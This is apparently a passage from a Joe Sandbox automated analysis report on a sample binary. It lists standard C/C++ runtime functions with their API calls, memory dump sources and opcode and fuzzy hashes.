Instruction Fuzzy Hash: 9C11AF719006299FCB15AB68D806BAEB7B4FF84320F14060BF511E7391DFB0AE448B82

Uniqueness

Uniqueness Score: -1.00%

Function 008D997A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,008D9971,008D9727,008D723F), ref: 008D9988
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008D9996
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008D99AF
SetLastError.KERNEL32(00000000,008D9971,008D9727,008D723F), ref: 008D9A01

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: bdbb8dba798860e9717c2836be00af276a60c2b9ee5b1d9ee01d4c09685d8994
Instruction ID: 32b4f3bb2f7eddce4dbe4c98480680b50ee6e4614250724f64794a41f098e8ac
Opcode Fuzzy Hash: bdbb8dba798860e9717c2836be00af276a60c2b9ee5b1d9ee01d4c09685d8994
Instruction Fuzzy Hash: F4017133209621AEAA1426796C95E7A2B56FB41774730033FF665C53E2EF514C01D546

Uniqueness

Uniqueness Score: -1.00%

Function 008D1F0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 008D1F18
int.LIBCPMT ref: 008D1F2B

Part of subcall function 008D260D: std::_Lockit::_Lockit.LIBCPMT ref: 008D261E
Part of subcall function 008D260D: std::_Lockit::~_Lockit.LIBCPMT ref: 008D2638

std::_Facet_Register.LIBCPMT ref: 008D1F5E
std::_Lockit::~_Lockit.LIBCPMT ref: 008D1F74

Strings

:, xrefs: 008D1F1D, 008D1F6B

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID: :
API String ID: 459529453-2162857627
Opcode ID: a3c25b03119652f990afcf8a5d4b61163c8e804ca2c2e8e5f7a8c1c2ee4be061
Instruction ID: 76f4a7cf0911137e0337e70ed9d9b0bc4dabbb8256701a259640a7880d5e4d86
Opcode Fuzzy Hash: a3c25b03119652f990afcf8a5d4b61163c8e804ca2c2e8e5f7a8c1c2ee4be061
Instruction Fuzzy Hash: C2018F72904518BBCB19AB68D949DADBB68FF94360B10035AFA11E7391EF70AE01C781

Uniqueness

Uniqueness Score: -1.00%

Function 008E1405 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,1DEEDD56,?,?,00000000,008F2E68,000000FF,?,008E1395,00000002,?,008E1369,008DDFC6), ref: 008E143A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008E144C
FreeLibrary.KERNEL32(00000000,?,?,00000000,008F2E68,000000FF,?,008E1395,00000002,?,008E1369,008DDFC6), ref: 008E146E

Strings

CorExitProcess, xrefs: 008E1444
mscoree.dll, xrefs: 008E1433

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 1ee6bfe86f27734dc4e863ecc143dd82f8e30be14ced2d0b4f833928a3884723
Instruction ID: d085aad4b492fc8de9463fbc1fb05cf79c9394cab7a073761c1152917dc8604b
Opcode Fuzzy Hash: 1ee6bfe86f27734dc4e863ecc143dd82f8e30be14ced2d0b4f833928a3884723
Instruction Fuzzy Hash: 91016771904659EFDB118F60DC09FBEBBB9FB44B14F014526E921E23D0DB749900CA54

Uniqueness

Uniqueness Score: -1.00%

Function 008D4935 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 008D493C
std::_Lockit::_Lockit.LIBCPMT ref: 008D4947
std::_Lockit::~_Lockit.LIBCPMT ref: 008D49B5

Part of subcall function 008D4A98: std::locale::_Locimp::_Locimp.LIBCPMT ref: 008D4AB0

std::locale::_Setgloballocale.LIBCPMT ref: 008D4962
_Yarn.LIBCPMT ref: 008D4978

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 93e171db2fc96df69d1c08c1432fb5f3941336138975445dfcc57ccfba1a5349
Instruction ID: 6c7392fa48588452c1271f3f53e5d2868788066450044a4cebef768d11a6ac44
Opcode Fuzzy Hash: 93e171db2fc96df69d1c08c1432fb5f3941336138975445dfcc57ccfba1a5349
Instruction Fuzzy Hash: 1401F275A001259FC709EF28D85997D7BB1FFC4350B15120AE92297391CF346E86CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 0091BC69 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0091BC75

Part of subcall function 0091BE4C: __getptd_noexit.LIBCMT ref: 0091BE4F
Part of subcall function 0091BE4C: __amsg_exit.LIBCMT ref: 0091BE5C

__getptd.LIBCMT ref: 0091BC8C
__amsg_exit.LIBCMT ref: 0091BC9A
__lock.LIBCMT ref: 0091BCAA
__updatetlocinfoEx_nolock.LIBCMT ref: 0091BCBE

Memory Dump Source

Source File: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 14d360ddc5f5134c6b4350502512b9c4de46fda78e3925e90e5399c2ca0cd54f
Instruction ID: 886e6bcb12435434ac734a25c5815086a514c939933115c84aa38355f9aa021a
Opcode Fuzzy Hash: 14d360ddc5f5134c6b4350502512b9c4de46fda78e3925e90e5399c2ca0cd54f
Instruction Fuzzy Hash: 68F09032B0171C9BE621BB7C98037CF32A1AF80720F200259F185AB2D2DF245DC18ADA

Uniqueness

Uniqueness Score: -1.00%

Function 008DAAC2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,008DAA73,00000000,00000001,009007B4,?,?,?,008DAC16,00000004,InitializeCriticalSectionEx,008F5E40,InitializeCriticalSectionEx), ref: 008DAACF
GetLastError.KERNEL32(?,008DAA73,00000000,00000001,009007B4,?,?,?,008DAC16,00000004,InitializeCriticalSectionEx,008F5E40,InitializeCriticalSectionEx,00000000,?,008DA9CD), ref: 008DAAD9
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,008D98E3), ref: 008DAB01

Strings

api-ms-, xrefs: 008DAAE6

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: f38b4effa1f2edc107f1a59141ca78e3c6e1ebe90d03a5c1b9701914dc989001
Instruction ID: a5b8b4eff42422ecee95ec0ac69d3c0cca863a3132814839ffbaf7d22524fb38
Opcode Fuzzy Hash: f38b4effa1f2edc107f1a59141ca78e3c6e1ebe90d03a5c1b9701914dc989001
Instruction Fuzzy Hash: F3E01A30280608B7EB501B71EC4AF693B56FB42B54F204023FA0CE81E0EB61D911C98E

Uniqueness

Uniqueness Score: -1.00%

Function 008E8187 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(1DEEDD56,00000000,00000000,00000000), ref: 008E81EA

Part of subcall function 008E95C0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,008E7477,?,00000000,-00000008), ref: 008E966C

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 008E8445
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 008E848D
GetLastError.KERNEL32 ref: 008E8530

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 3e1720361c1ec3279cafdf8887fb9b9eb4489dee2e097634d916fb1cb60186c1
Instruction ID: a7b31df80d588104a636037bcb09a8e5a94107896794d3dbc162442fc762aa0a
Opcode Fuzzy Hash: 3e1720361c1ec3279cafdf8887fb9b9eb4489dee2e097634d916fb1cb60186c1
Instruction Fuzzy Hash: 0CD16BB5D00298DFCF15CFA9D8809ADBBB5FF4A314F18412AE959E7351DB30A941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 008D9A91 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 008D9B58
___AdjustPointer.LIBCMT ref: 008D9B7B
___AdjustPointer.LIBCMT ref: 008D9C17

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 70ae3e77336102f39101242ad8d414cb81046fe826e72b3c505e278f883e4f8b
Instruction ID: 784b7aacbae5328cd96329cad745406d916c88b6b6a23c4f31d155ff7e2136cb
Opcode Fuzzy Hash: 70ae3e77336102f39101242ad8d414cb81046fe826e72b3c505e278f883e4f8b
Instruction Fuzzy Hash: 1D51D372604226AFEB299F29E841BBA77A4FF54324F15472BE885C7391E731EC40C791

Uniqueness

Uniqueness Score: -1.00%

Function 008E99DC Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 008E95C0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,008E7477,?,00000000,-00000008), ref: 008E966C

GetLastError.KERNEL32 ref: 008E9A40
__dosmaperr.LIBCMT ref: 008E9A47
GetLastError.KERNEL32(?,?,?,?), ref: 008E9A81
__dosmaperr.LIBCMT ref: 008E9A88

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 408ffb18a683999d51208136bb00ab299003f444ad3bf73d3ca21bc5a63a64da
Instruction ID: 0097977929761266f84b712e5ad7712cc5f1dbb9ba42087a764cd2690c0c641f
Opcode Fuzzy Hash: 408ffb18a683999d51208136bb00ab299003f444ad3bf73d3ca21bc5a63a64da
Instruction Fuzzy Hash: 9A21DA31604666AFCB20AF77DC80C2BB7A9FF423647108539F859C7251DBB0EC408791

Uniqueness

Uniqueness Score: -1.00%

Function 008E0747 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 938badd1965bb86ccc37cab8f06809f4114381d006ba77d8ac5ea026d5161fbb
Instruction ID: 463172fb200136de3fe9022cb6ddaeea89c03affb370b5cb8f553541479afe90
Opcode Fuzzy Hash: 938badd1965bb86ccc37cab8f06809f4114381d006ba77d8ac5ea026d5161fbb
Instruction Fuzzy Hash: 7E21C231600269AFDB10AF769C8092B77A9FF033687214935F825D7241EBB1EC908FE1

Uniqueness

Uniqueness Score: -1.00%

Function 008EA972 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 008EA97A

Part of subcall function 008E95C0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,008E7477,?,00000000,-00000008), ref: 008E966C

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008EA9B2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008EA9D2

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: dbdce8629dd12b59913dde68cb8749313641518ef3efe9c7497882d5637d3def
Instruction ID: 4cc045f5cd86f3a26ad1422e6c10621221f8c26419b938d18aeb1a16b21f48ef
Opcode Fuzzy Hash: dbdce8629dd12b59913dde68cb8749313641518ef3efe9c7497882d5637d3def
Instruction Fuzzy Hash: B011E1F65016A97EA615A7776DC9C7F3D9CFE877A8B110025F401E1102FA20ED80C1B3

Uniqueness

Uniqueness Score: -1.00%

Function 0091AB61 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0091AB87

Part of subcall function 0091A9B3: __fltout2.LIBCMT ref: 0091A9DE

__cftog_l.LIBCMT ref: 0091ABAD
__cftoe_l.LIBCMT ref: 0091ABDF

Memory Dump Source

Source File: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 2c4457193bb7507a2f765e1b5842f56a2c9db5a69680c2afb83d13e7584964b9
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 04114B3214518EBBCF125E84DC41CEE3F27BB58354B598455FA2859031C23BD9B1AB82

Uniqueness

Uniqueness Score: -1.00%

Function 008D1E93 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 008D1E9F
int.LIBCPMT ref: 008D1EB2

Part of subcall function 008D260D: std::_Lockit::_Lockit.LIBCPMT ref: 008D261E
Part of subcall function 008D260D: std::_Lockit::~_Lockit.LIBCPMT ref: 008D2638

std::_Facet_Register.LIBCPMT ref: 008D1EE5
std::_Lockit::~_Lockit.LIBCPMT ref: 008D1EFB

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: ac89b46c0a78fca1bf3e137c7d1b6062fd9886c7ab62c0c6f617d76e483c6fa9
Instruction ID: 0e93814e972ff16c3df8169c0ff975fef8c44b320d3b828cfd11c0fc9e9be3a8
Opcode Fuzzy Hash: ac89b46c0a78fca1bf3e137c7d1b6062fd9886c7ab62c0c6f617d76e483c6fa9
Instruction Fuzzy Hash: B301A732900114BBCB14AB68D909DAE7B68FF50760B10035BF911D7391EF709E01C781

Uniqueness

Uniqueness Score: -1.00%

Function 008D1E1A Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 008D1E26
int.LIBCPMT ref: 008D1E39

Part of subcall function 008D260D: std::_Lockit::_Lockit.LIBCPMT ref: 008D261E
Part of subcall function 008D260D: std::_Lockit::~_Lockit.LIBCPMT ref: 008D2638

std::_Facet_Register.LIBCPMT ref: 008D1E6C
std::_Lockit::~_Lockit.LIBCPMT ref: 008D1E82

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 5c893154a67fdac45120783b5b4aa618f4d06fb1d736fb746a3dbd60e660f847
Instruction ID: 1ceaf8882eea248afcc8ab6c0f710c91b8d8c1ad603c3c5a9da03dee201ed949
Opcode Fuzzy Hash: 5c893154a67fdac45120783b5b4aa618f4d06fb1d736fb746a3dbd60e660f847
Instruction Fuzzy Hash: 01012172900114ABCB25AB68D909DAEB769FF90760B10035AF925D7391EF709E41C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 0091B4E8 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0091B4F4

Part of subcall function 0091BE4C: __getptd_noexit.LIBCMT ref: 0091BE4F
Part of subcall function 0091BE4C: __amsg_exit.LIBCMT ref: 0091BE5C

__amsg_exit.LIBCMT ref: 0091B514
__lock.LIBCMT ref: 0091B524
_free.LIBCMT ref: 0091B554

Memory Dump Source

Source File: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3170801528-0
Opcode ID: 4475b636f4b6daa432483bfe3b8c9abc6dfeee5bf802842ed03bec2671514418
Instruction ID: 17cb4512675a1f89aba1478ffab79f9e562a895ad43fab63ba1cd5dd855a6ef9
Opcode Fuzzy Hash: 4475b636f4b6daa432483bfe3b8c9abc6dfeee5bf802842ed03bec2671514418
Instruction Fuzzy Hash: 7401D231F01729EBDB21AB2998067ED73A6BF80721F140115F945A3281CB34ADC1CFDA

Uniqueness

Uniqueness Score: -1.00%

Function 008F1040 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,008EFF0B,00000000,00000001,00000000,00000000,?,008E8584,00000000,00000000,00000000), ref: 008F1057
GetLastError.KERNEL32(?,008EFF0B,00000000,00000001,00000000,00000000,?,008E8584,00000000,00000000,00000000,00000000,00000000,?,008E8B0B,00000000), ref: 008F1063

Part of subcall function 008F1029: CloseHandle.KERNEL32(FFFFFFFE,008F1073,?,008EFF0B,00000000,00000001,00000000,00000000,?,008E8584,00000000,00000000,00000000,00000000,00000000), ref: 008F1039

___initconout.LIBCMT ref: 008F1073

Part of subcall function 008F0FEB: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,008F101A,008EFEF8,00000000,?,008E8584,00000000,00000000,00000000,00000000), ref: 008F0FFE

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,008EFF0B,00000000,00000001,00000000,00000000,?,008E8584,00000000,00000000,00000000,00000000), ref: 008F1088

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: d127ce15f873b218a130b7acf7f97e956a8878946c9294224dea21c4df599d7e
Instruction ID: dc0243350012ef60ec9ce3816621499c2c0af055fa078b36f6d6b06536610e5b
Opcode Fuzzy Hash: d127ce15f873b218a130b7acf7f97e956a8878946c9294224dea21c4df599d7e
Instruction Fuzzy Hash: 4DF0F836400568BBCF621FB59C08EAA3E6AFB883A0B044011FB09C5221DB32C8A0DB91

Uniqueness

Uniqueness Score: -1.00%

